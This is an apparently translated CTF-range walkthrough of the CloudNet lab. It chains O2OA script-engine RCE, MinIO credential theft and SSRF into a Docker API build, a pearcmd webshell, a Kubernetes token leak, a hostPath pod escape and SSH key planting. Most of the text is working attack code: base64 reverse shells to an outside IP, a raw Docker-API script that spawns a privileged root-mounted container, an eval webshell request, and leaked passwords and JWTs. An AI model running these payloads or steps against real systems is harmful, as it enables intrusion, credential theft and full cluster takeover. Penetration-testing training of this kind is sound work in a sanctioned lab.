春秋云境-CloudNet

flag01

Start with an fscan scan.

Port 8080 hosts O2OA:

http://39.98.124.230:8080/x_desktop/index.html

Default password:



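Create a new service.

https://github.com/o2oa/o2oa/issues/159

The vulnerability is, in essence, command execution through the ScriptEngineManager class. Restricting only java.lang.Class is bound to be bypassable; here java.lang.ClassLoader is used directly to load java.lang.Runtime and get around the restriction.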

    var a = mainOutput();
    function mainOutput() {
        var classLoader = Java.type("java.lang.ClassLoader");
        var systemClassLoader = classLoader.getSystemClassLoader();
        var runtimeMethod = systemClassLoader.loadClass("java.lang.Runtime");
        var getRuntime = runtimeMethod.getDeclaredMethod("getRuntime");
        var runtime = getRuntime.invoke(null);
        var exec = runtimeMethod.getDeclaredMethod("exec", Java.type("java.lang.String"));
        exec.invoke(runtime, "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjE0My4xMzAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}");
    }
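The command passed to `exec` is wrapped as `{echo,<base64>}|{base64,-d}|{bash,-i}` because `Runtime.exec(String)` splits its argument on whitespace and does not go through a shell, so a plain redirection such as `>&` would not survive. As a rough sketch (the helper name `decode_wrapped_command` is made up for illustration), the wrapped blob can be decoded offline to see what actually runs:

```python
import base64

# Payload string copied from the exec.invoke(...) call above.
command = (
    "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjE0My4xMzAvOTk5OSAwPiYx}"
    "|{base64,-d}|{bash,-i}"
)


def decode_wrapped_command(cmd: str) -> str:
    """Extract the base64 blob from the {echo,<blob>} group and decode it."""
    start = cmd.index("{echo,") + len("{echo,")
    end = cmd.index("}", start)
    return base64.b64decode(cmd[start:end]).decode("utf-8")


decoded = decode_wrapped_command(command)
print(decoded)
```

The decoded text is the ordinary bash reverse-shell one-liner pointing at the author's listener; the brace groups only exist to avoid literal spaces in the string handed to Java.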

The reverse shell yields the first flag.

    wget http://140.143.143.130:8080/frpc
    nohup ./gost -L=:10000 > ./gost.log &





flag02

First upload the proxy tool and get the proxy configured.

ifconfig is not available.

An fscan run turns up nothing of interest.



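Digging around leads to MinIO.

In the system configuration

there is a MinIO configuration block:

    "store": {
      "minio": {
        "protocol": "min",
        "username": "bxBZOXDlizzuujdR",
        "password": "TGdtqwJbBrEMhCCMDVtlHKU=",
        "host": "172.22.18.29",
        "port": 9000,
        "name": "o2oa"
      }
    },

Visit 172.22.18.29:9000:

http://172.22.18.29:9000/minio/login

Judging by the file contents, the portal bucket backs the site on port 80 of the target, and files can be uploaded to it.

Upload a webshell directly.

Wait for the sync to finish, then connect with AntSword (蚁剑).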

flag03

Upload fscan and do a round of information gathering.

    172.22.18.64:22 open
    172.22.18.61:22 open
    172.22.18.23:22 open
    172.22.18.29:22 open
    172.22.18.61:111 open
    172.22.18.64:80 open
    172.22.18.61:80 open
    172.22.18.23:80 open
    172.22.18.61:179 open
    172.22.18.23:8080 open
    172.22.18.29:9000 open
    172.22.18.61:9253 open
    172.22.18.61:9353 open
    172.22.18.23:10000 open
    172.22.18.61:10256 open
    172.22.18.61:10250 open
    172.22.18.61:10249 open
    172.22.18.61:10248 open
    172.22.18.61:30020 open
    172.22.18.61:32686 open
    [*] alive ports len is: 20
    start vulscan
    [*] WebTitle http://172.22.18.23 code:200 len:12592 title:广城市人民医院
    [*] WebTitle http://172.22.18.61:10248 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.29:9000 code:307 len:43 title:None 跳转url: http://172.22.18.29:9000/minio/
    [*] WebTitle http://172.22.18.23:10000 code:400 len:0 title:None
    [*] WebTitle https://172.22.18.61:32686 code:200 len:1422 title:Kubernetes Dashboard
    [*] WebTitle http://172.22.18.64 code:200 len:785 title:Harbor
    [*] WebTitle http://172.22.18.61:10256 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.61:10249 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.61:9353 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.61:9253 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.23:8080 code:200 len:282 title:None
    [*] WebTitle http://172.22.18.61 code:200 len:8710 title:医院内部平台
    [+] InfoScan https://172.22.18.61:32686 [Kubernetes]
    [*] WebTitle http://172.22.18.61:30020 code:200 len:8710 title:医院内部平台
    [+] InfoScan http://172.22.18.64 [Harbor]
    [*] WebTitle https://172.22.18.61:10250 code:404 len:19 title:None
    [*] WebTitle http://172.22.18.29:9000/minio/ code:200 len:2281 title:MinIO Browser
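With this many lines it is easy to lose track of which host exposes what. A small sketch, assuming the `IP:port open` line shape seen in the output above (the function name `open_ports` and the shortened sample are illustrative only), groups the open ports per host:

```python
import re
from collections import defaultdict

# A few lines copied from the scan output above; paste the full log in practice.
sample = """\
172.22.18.64:22 open
172.22.18.61:80 open
172.22.18.29:9000 open
172.22.18.61:32686 open
[*] WebTitle http://172.22.18.64 code:200 len:785 title:Harbor
"""

# Matches only the "IP:port open" lines; WebTitle/InfoScan lines are skipped.
OPEN_PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")


def open_ports(text):
    """Return a mapping of host -> sorted list of open ports."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        match = OPEN_PORT.match(line.strip())
        if match:
            hosts[match.group(1)].append(int(match.group(2)))
    return {host: sorted(ports) for host, ports in hosts.items()}


ports = open_ports(sample)
for host in sorted(ports):
    print(host, ports[host])
```

Run against the full log, this makes the roles stand out: 172.22.18.64 is Harbor, 172.22.18.29 is MinIO, and 172.22.18.61 carries the kubelet and dashboard ports.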

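MinIO SSRF against port 2375 to create a malicious container

The Harbor host allows unauthenticated access, so its repositories can be searched directly.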



    systemctl status docker
    # Find out where your own docker.service lives. Careful: do not blindly trust other writeups here, the file location may differ!
    # The Loaded line of the output shows the path of docker.service, for example:

Then edit that unit file:

    # Add the following to the [Service] section:
    [Service]
    Environment="HTTP_PROXY=socks5://1.1.1.1:40002/"

    sudo systemctl daemon-reload
    sudo systemctl restart docker

    docker pull 172.22.18.64/public/mysql:5.6
    docker run -itd --name mysql_container 172.22.18.64/public/mysql:5.6
    docker exec -it mysql_container bash



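The image has neither curl nor wget.

Borrowing from 大头's writeup: since curl and wget are missing, the requests have to be sent with bash's exec over /dev/tcp. The script below has four steps:

1. Create a container from the 172.22.18.64/public/mysql:5.6 image with Privileged set to true and the host's / mounted at /mnt inside the container. Save the id from the response to /tmp/id (this is the container id, so a truncated prefix is enough). The container is now in the Created state.

2. Start the container. Starting needs the container id, which is read back from /tmp/id. The container is now Running.

3. Create a command (an exec instance) for the container. The command is a reverse shell to port 19999 on the internet-facing entry host. Save the id from the response to /tmp/id (this is the exec id and must be captured in full, which is what the cut command does). The command has not run yet.

4. Run the command using the exec id captured in the previous step. Tty set to false means non-interactive.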

    #!/usr/bin/env bash

    # 1
    exec 3<>/dev/tcp/172.17.0.1/2375
    lines=(
        'POST /containers/create HTTP/1.1'
        'Host: 172.17.0.1:2375'
        'Connection: close'
        'Content-Type: application/json'
        'Content-Length: 133'
        ''
        '{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'
    )
    printf '%s\r\n' "${lines[@]}" >&3
    while read -r data <&3; do
        echo $data
        if [[ $data == '{"Id":"'* ]]; then
            echo $data | cut -c 8-12 > /tmp/id
        fi
    done
    exec 3>&-

    # 2
    exec 3<>/dev/tcp/172.17.0.1/2375
    lines=(
        "POST /containers/`cat /tmp/id`/start HTTP/1.1"
        'Host: 172.17.0.1:2375'
        'Connection: close'
        'Content-Type: application/x-www-form-urlencoded'
        'Content-Length: 0'
        ''
    )
    printf '%s\r\n' "${lines[@]}" >&3
    while read -r data <&3; do
        echo $data
    done
    exec 3>&-

    # 3
    exec 3<>/dev/tcp/172.17.0.1/2375
    lines=(
        "POST /containers/`cat /tmp/id`/exec HTTP/1.1"
        'Host: 172.17.0.1:2375'
        'Connection: close'
        'Content-Type: application/json'
        'Content-Length: 75'
        ''
        '{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/19999 0>&1"]}'
    )
    printf '%s\r\n' "${lines[@]}" >&3
    while read -r data <&3; do
        echo $data
        if [[ $data == '{"Id":"'* ]]; then
            echo $data | cut -c 8-71 > /tmp/id
        fi
    done
    exec 3>&-

    # 4
    exec 3<>/dev/tcp/172.17.0.1/2375
    lines=(
        "POST /exec/`cat /tmp/id`/start HTTP/1.1"
        'Host: 172.17.0.1:2375'
        'Connection: close'
        'Content-Type: application/json'
        'Content-Length: 27'
        ''
        '{"Detach":true,"Tty":false}'
    )
    printf '%s\r\n' "${lines[@]}" >&3
    while read -r data <&3; do
        echo $data
    done
    exec 3>&-
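Because the requests are written by hand, two details are easy to get wrong when adapting the script: the `Content-Length` values must match the JSON bodies byte for byte, and the `cut -c` offsets depend on the `{"Id":"` prefix being exactly 7 characters. The following sketch re-checks both offline. The response line and the 64-character id are made-up placeholders, not real daemon output:

```python
import json

# (body, Content-Length declared in the script) for the three requests with a body.
bodies = {
    "create": (
        '{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6",'
        '"HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}',
        133,
    ),
    "exec": (
        '{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/19999 0>&1"]}',
        75,
    ),
    "start": ('{"Detach":true,"Tty":false}', 27),
}

lengths = {}
for name, (body, declared) in bodies.items():
    json.loads(body)  # raises ValueError if the body is not valid JSON
    lengths[name] = (declared, len(body.encode("utf-8")))
    print(name, "declared:", declared, "actual:", lengths[name][1])

# Emulate `cut -c 8-12` and `cut -c 8-71` on a hypothetical response line.
prefix = '{"Id":"'
fake_id = "ab" * 32  # placeholder 64-character id
response_line = prefix + fake_id + '","Warnings":[]}'
short_id = response_line[7:12]  # cut -c 8-12: five characters of the container id
full_id = response_line[7:71]   # cut -c 8-71: the full 64-character id
print(short_id, len(full_id))
```

If the listener address or port in the `Cmd` body changes, the declared length for that request has to be recomputed the same way.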

Base64-encode the script above and embed it in a Dockerfile, then save the Dockerfile on the entry host as /var/www/html/Dockerfile:

    FROM 172.22.18.64/public/mysql:5.6

    RUN echo IyEvdXNyL2Jpbi9lbnYgYmFzaAoKIyAxCmV4ZWMgMzw+L2Rldi90Y3AvMTcyLjE3LjAuMS8yMzc1CmxpbmVzPSgKICAgICdQT1NUIC9jb250YWluZXJzL2NyZWF0ZSBIVFRQLzEuMScKICAgICdIb3N0OiAxNzIuMTcuMC4xOjIzNzUnCiAgICAnQ29ubmVjdGlvbjogY2xvc2UnCiAgICAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uJwogICAgJ0NvbnRlbnQtTGVuZ3RoOiAxMzMnCiAgICAnJwogICAgJ3siSG9zdE5hbWUiOiJyZW1vdGVDcmVhdGUiLCJVc2VyIjoicm9vdCIsIkltYWdlIjoiMTcyLjIyLjE4LjY0L3B1YmxpYy9teXNxbDo1LjYiLCJIb3N0Q29uZmlnIjp7IkJpbmRzIjpbIi86L21udCJdLCJQcml2aWxlZ2VkIjp0cnVlfX0nCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCiAgICBpZiBbWyAkZGF0YSA9PSAneyJJZCI6IicqIF1dOyB0aGVuCiAgICAgICAgZWNobyAkZGF0YSB8IGN1dCAtYyA4LTEyID4gL3RtcC9pZAogICAgZmkKZG9uZQpleGVjIDM+Ji0KCiMgMgpleGVjIDM8Pi9kZXYvdGNwLzE3Mi4xNy4wLjEvMjM3NQpsaW5lcz0oCiAgICAiUE9TVCAvY29udGFpbmVycy9gY2F0IC90bXAvaWRgL3N0YXJ0IEhUVFAvMS4xIgogICAgJ0hvc3Q6IDE3Mi4xNy4wLjE6MjM3NScKICAgICdDb25uZWN0aW9uOiBjbG9zZScKICAgICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKICAgICdDb250ZW50LUxlbmd0aDogMCcKICAgICcnCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCmRvbmUKZXhlYyAzPiYtCgojIDMKZXhlYyAzPD4vZGV2L3RjcC8xNzIuMTcuMC4xLzIzNzUKbGluZXM9KAogICAgIlBPU1QgL2NvbnRhaW5lcnMvYGNhdCAvdG1wL2lkYC9leGVjIEhUVFAvMS4xIgogICAgJ0hvc3Q6IDE3Mi4xNy4wLjE6MjM3NScKICAgICdDb25uZWN0aW9uOiBjbG9zZScKICAgICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24nCiAgICAnQ29udGVudC1MZW5ndGg6IDc1JwogICAgJycKICAgICd7IkNtZCI6IFsiL2Jpbi9iYXNoIiwgIi1jIiwgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIyLjE4LjIzLzE5OTk5IDA+JjEiXX0nCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCiAgICBpZiBbWyAkZGF0YSA9PSAneyJJZCI6IicqIF1dOyB0aGVuCiAgICAgICAgZWNobyAkZGF0YSB8IGN1dCAtYyA4LTcxID4gL3RtcC9pZAogICAgZmkKZG9uZQpleGVjIDM+Ji0KCiMgNApleGVjIDM8Pi9kZXYvdGNwLzE3Mi4xNy4wLjEvMjM3NQpsaW5lcz0oCiAgICAiUE9TVCAvZXhlYy9gY2F0IC90bXAvaWRgL3N0YXJ0IEhUVFAvMS4xIgogICAgJ0hvc3Q6IDE3Mi4xNy4wLjE6MjM3NScKICAgICdDb25uZWN0aW9uOiBjbG9zZScKICAgICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24nCiAgICAnQ29udGVudC1MZW5ndGg6IDI3JwogICAgJycKICAgICd7IkRldGFjaCI6dHJ1ZSwiVHR5IjpmYWxzZX0nCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCmRvbmUKZXhlYyAzPiYtCgoK | base64 -d > /tmp/1.sh
    RUN chmod +x /tmp/1.sh && /tmp/1.sh

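Save the index.php below on the entry host as /var/www/html/index.php.

Because of how the target behaves, it sometimes regenerates index.html, and while index.html exists the redirect does not work. To get around that, start a PHP server under /tmp and serve our own /tmp/index.php from there.

    <?php
    header('Location: http://127.0.0.1:2375/build?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:2', false, 307);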
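The redirect uses status 307 because, unlike 301/302 handling in many clients, a 307 requires the client to repeat the request with the same method, so the POST that MinIO issues stays a POST when it reaches the Docker API's `/build` endpoint. As a quick sanity check (a sketch, not part of the original exploit), the `Location` value can be parsed to confirm each piece lands where intended:

```python
from urllib.parse import urlsplit, parse_qs

# The Location value from index.php above.
location = (
    "http://127.0.0.1:2375/build"
    "?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:2"
)

parts = urlsplit(location)
params = parse_qs(parts.query)

print("target :", parts.hostname, parts.port, parts.path)
print("remote :", params["remote"][0])   # where the daemon fetches the Dockerfile
print("nocache:", params["nocache"][0])  # force the RUN steps to execute again
print("tag    :", params["t"][0])        # name:tag given to the built image
```

The loopback address is resolved on the MinIO host, which is why the daemon on 172.22.18.29 is the one that fetches and builds the Dockerfile.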

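Next, trigger the MinIO SSRF. Note that the Host header carries the SSRF address (the entry host, 172.22.18.23), while the HTTP packet itself is sent to MinIO (172.22.18.29).

The request can now be sent. The important part is that the connection really goes to 172.22.18.29, so the real target host has to be set to that address in the HTTP client, independently of the Host header.

    POST /minio/webrpc HTTP/1.1
    Host: 172.22.18.23:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
    Content-Type: application/json
    Content-Length: 76

    {"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}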

flag04

Command execution through the multi-language feature of the internal JizhiCMS (极致CMS)

The target runs JizhiCMS; the bug is the same as the ThinkPHP multi-language RCE.

    GET /index.php?+config-create+/&l=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/shell1.php HTTP/1.1
    Host: 172.22.18.61
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=4c0847ef686e7c800b472dd0972896eb
    Connection: close
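The odd-looking query string makes more sense once it is read as a command line. Assuming PHP's `register_argc_argv` is enabled on the target (an assumption, not something the writeup states), PHP fills `$_SERVER['argv']` by splitting the raw query string on `+`, and the included pearcmd script then treats those pieces as its arguments. A rough illustration of that split, with the PHP payload replaced by a `PAYLOAD` placeholder:

```python
# Raw query string from the request above, with the PHP payload replaced by a placeholder.
query = (
    "+config-create+/&l=../../../../../../../../../../../usr/local/lib/php/pearcmd"
    "&/<?=PAYLOAD?>+/var/www/html/shell1.php"
)

# Emulates how the query string would be turned into argv (assumption: register_argc_argv=On).
argv = query.split("+")

for index, arg in enumerate(argv):
    print(index, repr(arg))
```

Read this way, the request amounts to `pearcmd config-create <string containing the payload> /var/www/html/shell1.php`: the second argument is written into the generated config file, and the third is the path where that file lands.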

The configuration file can then be located:

    <?php return array (
      'db' =>
      array (
        'host' => 'mysql',
        'dbname' => 'jizhicms',
        'username' => 'root',
        'password' => 'Mysqlroot@!123',
        'prefix' => 'jz_',
        'port' => '3306',
      ),
      'redis' =>
      array (
        'SAVE_HANDLE' => 'Redis',
        'HOST' => '127.0.0.1',
        'PORT' => 6379,
        'AUTH' => NULL,
        'TIMEOUT' => 0,
        'RESERVED' => NULL,
        'RETRY_INTERVAL' => 100,
        'RECONNECT' => false,
        'EXPIRE' => 1800,
      ),
      'APP_DEBUG' => true,
    ); ?>

Connect to the database. It allows UDF privilege escalation (this can be learned from the configuration files inside the image pulled from Harbor). Use it to read the Kubernetes token:

    select load_file("/var/run/secrets/kubernetes.io/serviceaccount/token");

The query returns:

    eyJhbGciOiJSUzI1NiIsImtpZCI6IlRSaDd3eFBhYXFNTkg5OUh0TnNwcW00c0Zpand4LUliXzNHRU1raXFjTzQifQ.eyJhdWQiOlsiYXBpIiwiaXN0aW8tY2EiXSwiZXhwIjoxNzY2MzIxMDQxLCJpYXQiOjE3MzQ3ODUwNDEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2YyIsImp0aSI6IjljZjc5ZWI4LTM3NzgtNDkyMC05YWU0LTE4NDMyNjQ3MWVhMCIsImt1YmVybmV0ZXMuaW8iOnsibmFtZXNwYWNlIjoiZGVmYXVsdCIsIm5vZGUiOnsibmFtZSI6Im5vZGUyIiwidWlkIjoiYjAzYjUwZTgtOTBkOS00YjdkLWFmM2EtMGZiMjY3MWUyNjFmIn0sInBvZCI6eyJuYW1lIjoibXlzcWwtNmRmODc2ZDZkYy1mNnFmZyIsInVpZCI6ImNmMzMyYjUxLWM2NDYtNDExNi04ZGRhLTFmMDJiZTAyM2FmZSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoibXlzcWwiLCJ1aWQiOiJhNTMyNDZlNy0yZDFkLTQxMzMtOGM4OS05ZGNhMWI5YmIxNGYifSwid2FybmFmdGVyIjoxNzM0Nzg4NjQ4fSwibmJmIjoxNzM0Nzg1MDQxLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpteXNxbCJ9.QV_B2fmW4qT6kjK0_rPVNL72fK3nsOZOFXpnR3e6c3enZU03sA9lBowe4Nb0kGIE1I4WdBd6ItB6KAmAW2Xze17EXPVTvLzQZui-pJULVV_HfWCuJMp-H1KEVk3ZrS0UZ6sAH6HALGb_FrlzVVHVxbRybWk4t_h9yT8MxYz4XZkPe8AXxhqe41pcB5boI7scUSJQt0DYkLUtBVyg6o8FKRuzL5PHBqmGO_b6ab5L-abzjjGvoKBC9Tmc72_CPlHrKNEU9upu00lwRwYtUhVvi1jFamqmZSVTTrg9SI0-96lSLGVuu5AnO5j3UKYOUJLB1kKpVtxG1OJXeExgh8g4JQ
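A service account token is a JWT, so its middle segment can be decoded without any key to see which account, namespace, and expiry it carries before trying it anywhere. The sketch below uses a made-up sample token built in the script itself (the claims and the signature placeholder are illustrative); swapping in the real token string works the same way:

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment, as used in JWTs."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def b64url_encode(data: bytes) -> str:
    """Encode bytes as unpadded base64url (only used to build the sample)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def jwt_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


# Hypothetical sample shaped like a service account token (not the real one).
sample_claims = {
    "sub": "system:serviceaccount:default:mysql",
    "exp": 1766321041,
    "kubernetes.io": {"namespace": "default", "serviceaccount": {"name": "mysql"}},
}
sample_token = ".".join([
    b64url_encode(json.dumps({"alg": "RS256"}).encode("utf-8")),
    b64url_encode(json.dumps(sample_claims).encode("utf-8")),
    "signature-placeholder",
])

claims = jwt_claims(sample_token)
print(claims["sub"], claims["kubernetes.io"]["namespace"], claims["exp"])
```

Decoding only reveals what the token claims to be. What it is allowed to do is decided by the RBAC bindings on the cluster.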

The token logs in to the dashboard (https://172.22.18.61:32686) successfully. Create a pod that mounts the host filesystem to escape:

    apiVersion: v1
    kind: Pod
    metadata:
      name: q1ngchuan
    spec:
      containers:
      - image: 172.22.18.64/hospital/jizhicms:2.5.0
        name: test-container
        volumeMounts:
        - mountPath: /tmp
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

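flag05

Leaked service account token and taint-based lateral movement to take over the k8s master node

With the mount in place, go to the host's root/.ssh directory under the mount point.

    ssh-keygen -t rsa -b 4096
    # "id_rsa.pub" below stands for the contents of the generated public key, not the literal file name
    echo "id_rsa.pub"> authorized_keys

    ssh -i id_rsa root@172.22.18.61

Upload gost and fscan to the 172.22.18.61 target (jzcms):

    proxychains4 scp gost root@172.22.18.61:/tmp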

    (icmp) Target 172.22.15.45 is alive
    (icmp) Target 172.22.15.44 is alive
    (icmp) Target 172.22.15.75 is alive
    [*] Icmp alive hosts len is: 3
    172.22.15.45:80 open
    172.22.15.75:22 open
    172.22.15.44:22 open
    172.22.15.45:22 open
    172.22.15.44:111 open
    172.22.15.45:111 open
    172.22.15.75:111 open
    172.22.15.75:179 open
    172.22.15.44:179 open
    172.22.15.45:179 open
    172.22.15.75:2380 open
    172.22.15.75:2379 open
    172.22.15.75:5000 open
    172.22.15.75:6443 open
    172.22.15.44:9094 open
    172.22.15.45:9253 open
    172.22.15.44:9253 open
    172.22.15.75:9253 open
    172.22.15.75:9353 open
    172.22.15.44:9353 open
    172.22.15.45:9353 open
    172.22.15.75:10259 open
    172.22.15.75:10257 open
    172.22.15.75:10256 open
    172.22.15.44:10256 open
    172.22.15.45:10256 open
    172.22.15.75:10250 open
    172.22.15.44:10250 open
    172.22.15.44:10249 open
    172.22.15.75:10249 open
    172.22.15.44:10248 open
    172.22.15.75:10248 open
    172.22.15.45:10250 open
    172.22.15.45:10249 open
    172.22.15.45:10248 open
    172.22.15.75:30020 open
    172.22.15.44:30020 open
    172.22.15.45:30020 open
    172.22.15.44:32686 open
    172.22.15.45:32686 open
    172.22.15.75:32686 open
    [*] alive ports len is: 41
    start vulscan
    [*] WebTitle: http://172.22.15.45:9253 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.75:9353 code:404 len:19 title:None
    [*] WebTitle: https://172.22.15.75:32686 code:200 len:1422 title:Kubernetes Dashboard
    [*] WebTitle: http://172.22.15.44:10249 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.44:9353 code:404 len:19 title:None
    [+] InfoScan:https://172.22.15.75:32686 [Kubernetes]
    [*] WebTitle: http://172.22.15.44:9253 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.45:10248 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.75:9253 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.44:9094 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.44:10248 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.75:5000 code:200 len:0 title:None
    [*] WebTitle: http://172.22.15.75:10249 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.75:10256 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.45:9353 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.45:10249 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.44:10256 code:404 len:19 title:None
    [*] WebTitle: https://172.22.15.45:10250 code:404 len:19 title:None
    [*] WebTitle: https://172.22.15.44:32686 code:200 len:1422 title:Kubernetes Dashboard
    [*] WebTitle: https://172.22.15.44:10250 code:404 len:19 title:None
    [*] WebTitle: http://172.22.15.75:10248 code:404 len:19 title:None
    [*] WebTitle: https://172.22.15.75:6443 code:401 len:157 title:None
    [*] WebTitle: https://172.22.15.75:10257 code:403 len:217 title:None
    [*] WebTitle: https://172.22.15.75:10250 code:404 len:19 title:None
    [+] InfoScan:https://172.22.15.44:32686 [Kubernetes]
    [*] WebTitle: http://172.22.15.45:10256 code:404 len:19 title:None
    [*] WebTitle: https://172.22.15.75:10259 code:403 len:217 title:None

Port 6443 is open on 172.22.15.75, so that host is almost certainly the master node. Take the token obtained earlier and try to control the whole cluster with it:

    kubectl -s https://172.22.15.75:6443/ --insecure-skip-tls-verify=true --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IlRSaDd3eFBhYXFNTkg5OUh0TnNwcW00c0Zpand4LUliXzNHRU1raXFjTzQifQ.eyJhdWQiOlsiYXBpIiwiaXN0aW8tY2EiXSwiZXhwIjoxNzY2MzMyNTkzLCJpYXQiOjE3MzQ3OTY1OTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2YyIsImp0aSI6IjZhMTgzYzRhLTQ1NTgtNDhhMi04Y2Q0LTk4MmVmMjJhY2ZlMyIsImt1YmVybmV0ZXMuaW8iOnsibmFtZXNwYWNlIjoiZGVmYXVsdCIsIm5vZGUiOnsibmFtZSI6Im5vZGUyIiwidWlkIjoiYjAzYjUwZTgtOTBkOS00YjdkLWFmM2EtMGZiMjY3MWUyNjFmIn0sInBvZCI6eyJuYW1lIjoibXlzcWwtNmRmODc2ZDZkYy1mNnFmZyIsInVpZCI6ImNmMzMyYjUxLWM2NDYtNDExNi04ZGRhLTFmMDJiZTAyM2FmZSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoibXlzcWwiLCJ1aWQiOiJhNTMyNDZlNy0yZDFkLTQxMzMtOGM4OS05ZGNhMWI5YmIxNGYifSwid2FybmFmdGVyIjoxNzM0ODAwMjAwfSwibmJmIjoxNzM0Nzk2NTkzLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpteXNxbCJ9.N0NPwdfTCfxNaQ8HUv8FwThLYOwY2pHQ9fcFzs7VyDgnqBDMjjrViVxOxlaSCPG_WPnLwwJUp5BKS3Dm0gTiHnvP7oA7c0HQ3HSMTk_A9D9Ty5MFyViWSVazon416QyQpW0xRVVIrnufKMPd62vurMel5eaLlYvU-hkQInPOenSAFmpBdoCXCWY93-hPvJ7p4fDwmSZsSdVY7CpZSHlKDWFWXinHGVg5E0FWJYDYmAP61f0rAKEVMpl82YdMcrGXQWljmPwoDe2kS1DSH9l-j9vejn3RkuIW1hyUS7NJv_Sx9CvQkeJvxMFO_LmRUGMy0u8wzE_WgvK50KTN2qOaSQ describe nodes

Restore the master to a schedulable state:

